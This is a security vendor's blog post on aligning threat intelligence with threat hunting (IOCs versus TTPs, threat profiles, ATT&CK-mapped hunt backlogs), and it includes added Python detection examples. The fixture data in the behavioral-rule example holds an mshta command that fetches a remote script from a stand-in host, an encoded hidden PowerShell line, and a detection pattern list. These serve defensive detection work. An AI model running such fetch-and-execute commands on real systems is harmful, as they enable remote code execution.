
Creating Actionable Threat Intelligence for Threat Hunters

Ask any security leader and they’ll tell you actionable threat intelligence is the cornerstone of a successful, threat-informed security operations center (SOC). To be of real value, though, threat intelligence needs to be relevant, timely, and supportive of next steps for the teams that use it. The sheer volume of threat intelligence, and the effort it takes to sift through it, means teams can’t easily find and act on the intelligence that really matters, leaving reports unhelpful and unused. A recent report found that 93% of CISOs are concerned about dark web threats, yet almost a quarter of CISOs have no threat intelligence capability at all.

Because threat intelligence analysts are siloed from other core functions in the SOC, like threat hunting, detection engineering, and incident response, they frequently package their findings in verbose reports that aren’t written in a form those practitioners can act on. As a result, threat intelligence reports don’t always contain the actionability or clear next steps that teams need to mobilize. In the end, reports can eat up a significant proportion of the security budget and amount to nothing more than expensive shelfware.

To reap the full value of threat intelligence and use it to mobilize against relevant threats, analysts and hunters need to be on the same page from the start. Actionable threat intelligence says which threats are likely to affect the organization and how they would show up in its environment; by understanding the threat hunters’ needs, goals, and approach to the hunt, threat intelligence analysts can prepare reports that transform the SOC into an intelligence-led, threat-informed organization.

There are three commonly used kinds of threat intelligence, each serving a different audience; the last is the one threat hunters work from most directly:
  • Tactical threat intelligence covers IOCs (hashes, IP addresses, domains) and similar atomic indicators that drive immediate network- or host-level action, such as blocking and alerting. It deals with threats one indicator at a time.
  • Strategic threat intelligence places broader threat trends in the context of the organization. It helps teams weigh the risk and potential impact of threats against the strategic direction of the organization.
  • Operational threat intelligence describes how adversaries operate: their campaigns, tooling, and TTPs. It is what threat hunters use to form hypotheses, catalog adversary behavior, and scope complete remediation of the threat at hand. It provides them with a roadmap to take action against the adversary.

The Disconnect Explained: Where Does Threat Intelligence Fall Short?

Threat intelligence analysts and threat hunters share the same overall goal: protect the organization. So while they’re aiming for the same target, where (and why) are they missing each other?

Threat Intelligence Disconnect #1: IOCs vs. TTPs

Most intelligence reports contain verbose information about the threat with things like screenshots, IOCs, and more. Sometimes, they’ll include the analysts’ observations of commands and process execution – but there isn’t a standardized process to generate reports, and it can be hard to tell whether or not the information is comprehensive.

Additionally, the report will likely include a selection of IOCs that can be deployed as SecOps queries, but the questions remain: are they comprehensive? Have they been adequately enriched to determine maliciousness? As a reader, the hunter is left with more questions and work left to do rather than concrete answers and next steps.

Threat intelligence reports that provide actionless data force hunters to do their own research across the breadth of data they’ve been given, synthesizing various reports to reach their own conclusions. Only then can they engineer a hunt from the threat information available to them.
A great deal of available IOC data consists of discrete items that haven’t been enriched for further action. To extract value from them, threat hunters have to load them into their own systems and use their own data feeds to establish their validity, relevance, and completeness. Since IOCs are ephemeral and constantly changing, using them in a threat hunt demands extensive effort from the hunter.
For research, IOC data can offer useful insight, but it is far less useful than TTPs as a direct input to hunt and detection development.

Threat Intelligence Disconnect #2: Lack of Technical Alignment

Because threat intelligence teams must create reports to support so many different stakeholders, their reports aren’t always focused on the environmental nuances that matter most to threat hunters. Even if they have the right organizational context in mind, they’re likely focusing more on business risk and impact (to support leadership, like CISOs) rather than deep technical details.
Reports need to be understood by highly technical team members (threat hunters, detection engineers, etc.) AND more strategic people (CISOs, VPs, investors, etc.). Unfortunately, threat intelligence analysts are extremely under-resourced and don’t have the bandwidth to personally tailor each one for its intended audience.
Additionally, many threat intelligence reports are deliberately generic, because the context that would make them specific (an organization’s industry and way of doing business) varies so much from one reader to the next. For example, a large enterprise might operate in several different industries or serve clients in very different environments, and it needs to be aware of the threats facing each industry it has a stake in.
Another key challenge is that organizations use the tools in their tech stack in vastly different ways; a high-impact vulnerability in a tool under one deployment pattern may be far less impactful, or not even reachable, under another.

Threat Intelligence Disconnect #3: Outdated Information

Threat intelligence can quickly become outdated as the fast-paced threat landscape changes and evolves. Sometimes, because they’re taking a look back at what’s happened in their network, threat hunters do need historical data. An IP address that was malicious 6 months ago might not be malicious anymore, but if the hunter finds a connection to that IP 6 months back, it could be a signal to keep digging in that area to see if there is more evidence of breach.
However, the average SOC holds onto a great deal of data that is only meaningful at a single point in time. Threat hunters can’t possibly sift through all of the outdated data in their network in the hope of finding something useful, especially when much of it is tied to IOCs with specific timestamps. IOCs are a big source of friction here, because they carry none of the evergreen threat information, like behaviors, that stays valid as infrastructure changes.
Another limitation is simply the nature of cybersecurity: it’s difficult to communicate information quickly enough that it’s still relevant by the time it reaches the threat hunter. A major barrier is the ephemeral, ever-changing nature of security data; the burden of maintaining data so that it stays relevant and correct is extremely high. As time goes on, the data stored in a SOC gets overwritten with new information, and the historically significant context is lost.
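The "malicious 6 months ago" case above is worth making concrete, because the usual shortcut (drop stale indicators, then match on value alone) gets it wrong in both directions. The following is an added example, not code from SnapAttack or the original post: it carries each indicator's first-seen/last-seen window and matches historical connections against that window, flagging old hits as leads to pivot on rather than as live infrastructure. The feed name, indicators, timestamps and log lines are constructed for illustration.

```python
"""Time-aware IOC matching for retrospective hunting.

Added example, not code from SnapAttack or the original post. The feed name,
indicators, timestamps and log lines are all constructed for illustration.
An indicator carries the window in which it was observed malicious; a
historical event matches if its timestamp falls inside that window, whether
or not the indicator is still considered malicious today.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone

UTC = timezone.utc


@dataclass(frozen=True)
class Ioc:
    value: str          # the indicator itself (an IPv4 address here)
    first_seen: datetime
    last_seen: datetime
    source: str         # constructed feed name


# "Today" for the example, fixed so the results are reproducible.
NOW = datetime(2024, 6, 1, tzinfo=UTC)

# Constructed indicators: one C2 address that was active about six months
# ago and one that is active now.
IOCS = [
    Ioc("203.0.113.45", datetime(2023, 11, 20, tzinfo=UTC),
        datetime(2023, 12, 15, tzinfo=UTC), "constructed-feed"),
    Ioc("198.51.100.7", NOW - timedelta(days=3), NOW, "constructed-feed"),
]

# Constructed outbound-connection log: "<timestamp> <src> <dst>:<port>".
LOG = """\
2023-12-02T03:14:07Z 10.0.4.21 203.0.113.45:443
2024-05-30T22:41:10Z 10.0.4.22 198.51.100.7:8443
2024-05-30T09:00:00Z 10.0.4.23 203.0.113.45:443
2023-10-01T12:00:00Z 10.0.4.21 203.0.113.45:443
"""


def parse_log(text):
    """Parse the constructed log format into (timestamp, src, dst_ip, port)."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst = line.split()
        ip, _, port = dst.rpartition(":")
        when = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=UTC)
        events.append((when, src, ip, int(port)))
    return events


def current_only_matches(events, iocs, now=NOW, max_age=timedelta(days=30)):
    """The common shortcut: discard 'stale' indicators, then match on value.

    This misses the six-month-old beacon entirely, and if the old indicator
    were kept it would flag today's traffic to a since-reassigned address.
    """
    fresh = {i.value for i in iocs if now - i.last_seen <= max_age}
    return [e for e in events if e[2] in fresh]


def time_aware_matches(events, iocs, now=NOW, slack=timedelta(days=7),
                       max_age=timedelta(days=30)):
    """Match each event against the indicator's own validity window.

    `slack` widens the window to allow for reporting lag. `still_active`
    tells the hunter whether the hit is a historical lead to pivot on or
    something that may still be live.
    """
    hits = []
    for when, src, ip, port in events:
        for ioc in iocs:
            if ioc.value != ip:
                continue
            if ioc.first_seen - slack <= when <= ioc.last_seen + slack:
                hits.append({
                    "ts": when, "src": src, "ioc": ioc.value, "port": port,
                    "source": ioc.source,
                    "still_active": now - ioc.last_seen <= max_age,
                })
    return hits


if __name__ == "__main__":
    evs = parse_log(LOG)
    print("current-only:", [e[1] for e in current_only_matches(evs, IOCS)])
    for h in time_aware_matches(evs, IOCS):
        print("time-aware:", h["ts"].isoformat(), h["src"], "->", h["ioc"],
              "(still active)" if h["still_active"] else "(historical lead)")
```

Run as written, the current-only pass reports only the May 30 connection to the live indicator. The time-aware pass additionally surfaces the December connection from 10.0.4.21 to 203.0.113.45, marked as a historical lead, and correctly ignores the May 30 connection to that same address because it falls outside the indicator's window. That December hit is exactly the "keep digging in that area" signal the paragraph above describes.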

Threat Intelligence Disconnect #4: Strategic Misalignment

If organizations aren’t aligned from the very top all the way down, it’s challenging for individual teams to understand the correct intelligence collection requirements. Leadership must understand and share the security goals that the tactical teams are working towards. For that to happen, all teams need to be working from the same threat information – which requires a strong foundation of threat intelligence from the analysts.
To create this strategic alignment and invest in the right threat intelligence, organizations need to invest in the practices and tooling that improve visibility into their threat landscape, such as:
  • Threat modeling
  • Threat profiles
  • MITRE ATT&CK mapping
The challenge? Few have the time or resources to buy, configure, and maintain this tooling. So they’re stuck improvising and taking best guesses at the threat information that sets the tone for their entire strategic security mission.

How to Create Actionable Threat Intelligence for Threat Hunters

Threat intelligence analysts are tasked with creating reports that are flexible, yet detailed; evergreen, yet quickly produced; and actionable, yet generic enough for different audiences. That’s a lot of competing qualities, and most of the time, the end result achieves almost none of them.
When threat intelligence analysts focus on the components that allow a threat hunter to take the report and immediately spring into action, they can create something that goes further than a piece of shelfware. They can enact real change and threat-informed defense within their organization.

Actionable Threat Intelligence Tip #1: Perform Enterprise Threat Modeling

When threat intelligence gathering and analysis begins with a thorough understanding of the organization’s priorities and areas of risk, threat intelligence analysts can narrow down their findings to those that are most important to teams like threat hunting. But how can they boil it all down to something that’s valuable to threat hunters specifically?
It all begins with a thorough understanding of their threat landscape, and the organization’s place within it. Analyzing the context of one’s organization can help the team understand what kinds of threats and actors are most likely to impact them.
Many organizations uncover their highest priority threats through threat modeling, the identification and mitigation of threats based on relevance, impact, and organizational risk. This information can be summarized in something like a threat profile, outlining the highest-probability threats based on factors specific to the organization, like:
  • Geographical location
  • Industry
  • Organization size
  • Tech stack
  • And more
To go even further, analysts can use TTPs and other indicators to build threat actor profiles for their highest-priority threats. A threat actor profile should brief hunters on the behaviors, methods, tools, and characteristics that distinguish that actor, ideally mapped to ATT&CK techniques so hunters can turn them directly into hunt hypotheses. It should also describe how the actor would manifest within the network, such as:
  • Unusual network traffic patterns
  • Unexpected file changes
  • Anomalies in user behavior
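The threat profile and threat actor profiles described above only pay off when they are turned into a ranked list of things to hunt for. The following is an added example (not SnapAttack's code) of that step: it scores each constructed actor profile against the organization's industry and region, keeps only the techniques that have a surface to land on in the organization's tech stack, and sums the scores into an ATT&CK-mapped hunt backlog. The organization profile, the actor labels ACTOR-A/B/C, the surface mapping and the weights are all constructed assumptions; only the ATT&CK technique IDs and names are real.

```python
"""From a threat profile to a prioritized, ATT&CK-mapped hunt backlog.

Added example, not SnapAttack's code. The organization profile, the actor
profiles (ACTOR-A/B/C) and the technique-to-surface mapping are constructed;
only the ATT&CK technique IDs and names are real. Scoring weights are
illustrative and should be tuned to the organization's own threat model.
"""
from collections import defaultdict

# Constructed profile of the organization being defended.
ORG_PROFILE = {
    "industry": "financial services",
    "region": "EU",
    "tech_stack": {"windows", "active_directory", "m365", "vpn_appliance", "linux"},
}

# Constructed actor profiles: who they target and which techniques they use.
ACTOR_PROFILES = [
    {"name": "ACTOR-A", "industries": {"financial services", "healthcare"},
     "regions": {"EU", "NA"},
     "techniques": {"T1566.001", "T1059.001", "T1003.001", "T1021.001", "T1486"}},
    {"name": "ACTOR-B", "industries": {"manufacturing"}, "regions": {"APAC"},
     "techniques": {"T1190", "T1505.003", "T1059.004"}},
    {"name": "ACTOR-C", "industries": {"financial services"}, "regions": {"EU"},
     "techniques": {"T1078", "T1110.003", "T1021.001", "T1059.001",
                    "T1053.005", "T1505.003"}},
]

TECHNIQUE_NAMES = {
    "T1566.001": "Spearphishing Attachment", "T1059.001": "PowerShell",
    "T1003.001": "LSASS Memory", "T1021.001": "Remote Desktop Protocol",
    "T1486": "Data Encrypted for Impact", "T1190": "Exploit Public-Facing Application",
    "T1505.003": "Web Shell", "T1059.004": "Unix Shell", "T1078": "Valid Accounts",
    "T1110.003": "Password Spraying", "T1053.005": "Scheduled Task",
}

# Constructed mapping: the parts of the tech stack a technique needs in order
# to be relevant. Any one is enough; an empty set means "always applicable".
TECHNIQUE_SURFACES = {
    "T1059.001": {"windows"}, "T1003.001": {"windows"}, "T1021.001": {"windows"},
    "T1053.005": {"windows"}, "T1566.001": {"m365"}, "T1486": set(),
    "T1190": {"vpn_appliance", "web_server"}, "T1505.003": {"web_server"},
    "T1059.004": {"linux"}, "T1078": {"active_directory"},
    "T1110.003": {"active_directory", "vpn_appliance"},
}


def actor_relevance(actor, org):
    """How much this actor's targeting overlaps the organization (0 = ignore)."""
    score = 0.0
    if org["industry"] in actor["industries"]:
        score += 1.0
    if org["region"] in actor["regions"]:
        score += 0.5
    return score


def technique_applies(technique, org):
    """Drop techniques that have no surface to land on in this environment."""
    surfaces = TECHNIQUE_SURFACES.get(technique)
    if surfaces is None:
        return True  # unmapped technique: keep it rather than silently drop it
    return not surfaces or bool(surfaces & org["tech_stack"])


def build_hunt_backlog(org=ORG_PROFILE, actors=ACTOR_PROFILES):
    """Rank techniques by the summed relevance of the actors known to use them."""
    scores = defaultdict(float)
    attribution = defaultdict(list)
    for actor in actors:
        weight = actor_relevance(actor, org)
        if weight == 0:
            continue
        for technique in actor["techniques"]:
            if technique_applies(technique, org):
                scores[technique] += weight
                attribution[technique].append(actor["name"])
    backlog = [{"technique": t, "name": TECHNIQUE_NAMES.get(t, "?"),
                "score": s, "actors": sorted(attribution[t])}
               for t, s in scores.items()]
    backlog.sort(key=lambda row: (-row["score"], row["technique"]))
    return backlog


if __name__ == "__main__":
    for row in build_hunt_backlog():
        print(f'{row["technique"]:10} {row["score"]:.1f} '
              f'{row["name"]:32} {", ".join(row["actors"])}')
```

With the constructed inputs, ACTOR-B drops out entirely (wrong industry and region), Web Shell drops out because the organization runs no web server, and the two techniques shared by both relevant actors (RDP and PowerShell) rise to the top of the backlog. Adding "web_server" to the tech stack brings Web Shell back in, which is the tech-stack sensitivity the Disconnect #2 section describes.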

Actionable Threat Intelligence Tip #2: Go Beyond IOCs and Gather TTPs

Though IOCs are a critical component of any threat-informed strategy, they can’t carry the entire strategy alone. Because IOCs are short-lived and easy for an adversary to change, threat hunters need the insight that comes from TTPs: insight into how the attacker behaves and where they’re headed, rather than the places they’ve already been.
[Figure: the Pyramid of Pain, with TTPs at the top and IOCs at the bottom]

David Bianco’s Pyramid of Pain provides a stellar visual hierarchy of the difference between IOCs and TTPs. Hash values, IP addresses, and domain names sit at the bottom of the pyramid because the adversary can change them trivially and they say little about who is behind the activity; TTPs sit at the top because changing how an adversary operates costs them the most. Because threat hunters are actively searching for advanced, unknown threats, they need the indicators higher up the pyramid, and TTPs above all.

TTPs provide a behavioral focus that helps hunters understand core behaviors of the threat actor, predict their future moves, and trace their actions with a trail that’s harder for them to cover up. IOCs simply uncover what a threat actor has already done; TTPs tell threat hunters HOW the threat actor operates.
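Disconnect #1 and the Pyramid of Pain discussion both come down to the same point, so here is one added example that shows it in working code (not code from SnapAttack or the original post). It runs a report's IOCs and a TTP-style behavioral rule side by side over a handful of constructed endpoint process-creation events: the first campaign is caught by both, the same actor's retooled activity (new hash, new infrastructure) is caught only by the behavioral rule, and a legitimate admin script is caught by neither. The events, hashes, addresses, command lines and the fictional report's IOCs are all constructed.

```python
"""IOC matching beside a TTP-style behavioral rule over endpoint events.

Added example, not code from SnapAttack or the original post. The events,
hashes, addresses and command lines below are constructed for illustration.
The behavioral rule ("an Office application spawning a shell or script
host") is one common expression of the execution step that follows a
malicious attachment (ATT&CK T1566.001 leading into T1059).
"""
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Command-line fragments that raise severity when the rule fires.
SUSPICIOUS_ARGS = ("-enc", "-encodedcommand", "-w hidden", "http", "downloadstring")

# Constructed IOCs from a (fictional) report on the first campaign: the
# dropper hash and its C2 address.
IOCS = {
    "sha256": {"0f1e" * 16},
    "dst_ip": {"203.0.113.45"},
}

# Constructed process-creation events. 1 = first campaign (in the report),
# 2 and 4 = the same actor after rotating hash and infrastructure,
# 3 = a legitimate admin script, included as a false-positive check.
# The -enc payload is base64 of UTF-16LE "ABC", i.e. harmless.
EVENTS = [
    {"id": 1, "host": "ws01", "parent": "WINWORD.EXE", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc QQBCAEMA",
     "sha256": "0f1e" * 16, "dst_ip": "203.0.113.45"},
    {"id": 2, "host": "ws02", "parent": "EXCEL.EXE", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc QQBCAEMA",
     "sha256": "a7c3" * 16, "dst_ip": "198.51.100.9"},
    {"id": 3, "host": "ws03", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -File C:\\Scripts\\backup.ps1",
     "sha256": "9b2d" * 16, "dst_ip": ""},
    {"id": 4, "host": "ws04", "parent": "OUTLOOK.EXE", "image": "cmd.exe",
     "cmdline": "cmd.exe /c mshta http://example.invalid/r.hta",
     "sha256": "5e61" * 16, "dst_ip": "192.0.2.77"},
]


def ioc_matches(events, iocs):
    """Atomic matching: fires only on the exact hash or address in the report."""
    return [e["id"] for e in events
            if e["sha256"] in iocs["sha256"] or e["dst_ip"] in iocs["dst_ip"]]


def office_spawns_script_host(event):
    """Behavioral rule. Parent and image are compared case-insensitively
    because Windows logs them inconsistently."""
    return (event["parent"].lower() in OFFICE_PARENTS
            and event["image"].lower() in SCRIPT_HOSTS)


def severity(event):
    """Escalate when the command line carries encoding, hiding or download cues."""
    cmd = event["cmdline"].lower()
    return "high" if any(arg in cmd for arg in SUSPICIOUS_ARGS) else "medium"


def ttp_matches(events):
    """(event id, severity) for every event the behavioral rule fires on."""
    return [(e["id"], severity(e)) for e in events if office_spawns_script_host(e)]


def compare(events=EVENTS, iocs=IOCS):
    """Which events each approach catches; 'ttp_only' is the retooled
    activity the report's IOCs can no longer see."""
    ioc = set(ioc_matches(events, iocs))
    ttp = {i for i, _ in ttp_matches(events)}
    return {"both": sorted(ioc & ttp), "ioc_only": sorted(ioc - ttp),
            "ttp_only": sorted(ttp - ioc)}


if __name__ == "__main__":
    print(compare())  # {'both': [1], 'ioc_only': [], 'ttp_only': [2, 4]}
```

The behavioral rule is deliberately narrow (a specific parent/child relationship plus command-line cues) rather than "any PowerShell", which is why the admin script from explorer.exe stays quiet. In practice a hunter would start from the report's IOC hit (event 1), read the behavior it exhibits, and generalize it into a rule like this one so that the next hash and IP rotation does not reset their visibility to zero.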

Actionable Threat Intelligence Tip #3: Provide Timely, Dynamic Insights

Threat actors move fast – but threat intelligence analysts need to move faster. In order for threat hunters to get ahead of relevant threats, the reports they’re working from should be updated with the most timely threat intelligence available.
Threat intelligence analysts must stay up-to-date on new and emerging threats, both as they’re released and as their information is updated. When a new zero day or CVE drops, threat intelligence analysts need to be the first to know – and they need to keep a close eye on how they develop.
To stay on top of threat information, analysts can utilize a variety of resources. Automated feeds are a great start, but they’re only the beginning. The most recent and relevant information tends to come from humans, using social media, forums, the news, word-of-mouth, and other manual formats.

Actionable Threat Intelligence Tip #4: Facilitate Collaboration

Though the two teams are typically siloed, the results they produce when they collaborate far outweigh what they can do alone. Threat intelligence and hunting teams should create channels so they can share insights, learn from one another, and ensure they’re both working towards the same strategic objectives.
For threat intelligence analysts and threat hunters to understand each other’s priorities and needs, they should implement continuous feedback loops. An open and consistent line of communication can help analysts understand what threat hunters need, and threat hunters provide feedback to drive further improvement on the strategy.

Threat hunters need the ability to provide feedback on the relevance and usefulness of threat intelligence reports, as well as to request additional information. If threat hunters can simply ask for what they need, intelligence analysts don’t have to guess what they should investigate.

A great use case for collaboration between intelligence and threat hunters is in the creation of a hunt hypothesis. Threat intelligence analysts can help hunters develop a hypothesis using the expansive context they have of the threat landscape and the organization. Alternatively, when threat hunters already have a hunt hypothesis in mind, they may need to do their own research – but if they have an open line of communication with intelligence, they can glean insights from them and their knowledge of the threat landscape.

Get Threat Intelligence and Threat Hunting Teams on the Same Page

Actionable threat intelligence is the key to an aligned and focused threat hunting strategy, but few organizations have the bandwidth, tooling, or visibility to keep the two teams on the same page.
SnapAttack is a centralized platform that streamlines threat hunting by uncovering the blind spots and priorities that organizations need to worry about. It helps siloed teams collaborate and share key insights so they’re both working from the same information – information that’s constantly updated and aligned to your threat landscape.

The platform ties your unique threat landscape into built-in threat intelligence from both our expert threat research team and Mandiant (now part of Google Cloud) to produce a dynamic, tailored Threat Profile. Get in touch with our team to find out how we can help you fortify your threat management today.

About SnapAttack: SnapAttack is an innovator in proactive, threat-informed security solutions. The SnapAttack platform helps organizations answer their most pressing question: “Are we protected against the threats that matter?”

By rolling threat intelligence, adversary emulation, detection engineering, threat hunting, and purple teaming into a single, easy-to-use product with a no-code interface, SnapAttack enables companies to get more from their tools and more from their teams so they can finally stay ahead of the threat.